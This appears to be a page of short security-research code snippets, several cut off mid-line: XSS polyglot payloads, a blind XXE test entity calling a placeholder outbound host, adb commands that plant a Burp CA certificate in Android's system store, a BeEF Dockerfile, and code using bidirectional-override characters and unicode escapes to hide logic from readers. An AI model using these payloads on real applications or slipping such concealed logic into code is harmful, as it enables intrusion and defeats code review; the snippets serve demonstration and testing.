eoftedal

let isAdmin = false
/*‮ } ⁦if(isAdmin)⁩ ⁦ begin admins only */
console.log("you are an admin")
/* end admin only ‮ { ⁦ */

eoftedal

map $http_x_b3_traceid $b3traceid {
	"~^(?<traceid>[a-f0-9]{32})$" $traceid;
	default $request_id;
}
proxy_set_header x-b3-traceId $b3traceid;

eoftedal

#!/bin/bash

export COLOR_NC=$(tput sgr0)
export COLOR_GREEN=$(tput setaf 2)

if [ $# -ne 2 ]; then
    echo "ERROR: no image given"
    echo "USAGE: ./scan.sh <some_image>[:some_tag] <path in image>"
    exit 1
fi

eoftedal

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> 
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` 
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> 
javascript:`</template>\"///"//<

eoftedal

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

eoftedal

http://techblog.vsza.hu/posts/Using_Android_emulator_with_Burp_Suite.html

adb shell mount -o rw,remount /system
openssl x509 -in burp.cer -inform DER -text
openssl x509 -noout -subject_hash_old -inform DER -in burp.cer
adb push burp.cer /system/etc/security/cacerts/9a5ba575.0

eoftedal

FROM ubuntu
RUN apt-get update && apt-get upgrade -y && apt-get install -y build-essential libsqlite3-dev sqlite3 libssl-dev curl
RUN apt-get install -y software-properties-common && \
        apt-add-repository -y ppa:brightbox/ruby-ng && \
        apt-get update && \
        apt-get install -y ruby2.1 ruby2.1-dev
WORKDIR /opt/
RUN locale-gen en_US.UTF-8
ENV LC_ALL en_US.UTF-8
RUN     curl https://codeload.github.com/beefproject/beef/tar.gz/beef-0.4.6.1 -o beef-0.4.6.1.tar.gz  && \

eoftedal

public class Puzzle {
        public static void main(String[] args) {
                String a = "1";
                String b = "\u0022\u003b\u0061\u003d\u0022\u0032\u0022\u003b\u002f\u002f";
                System.out.println(a);
        }
}

eoftedal

import java.security.SecureRandom;
import java.math.BigInteger;
 
public class Lottery {
        private static SecureRandom random = new SecureRandom();
        public static void main(String[] args) {
/*
 
****************************************************************************************************************************************
 

eoftedal

import java.security.SecureRandom;
import java.math.BigInteger;

public class Lottery {
	private static SecureRandom random = new SecureRandom();

	public static void main(String[] args) {
		String lotteryNumber = new BigInteger(130, random).toString(32);
		/* Used when testing \u002a\u002f
		lotteryNumber = "123";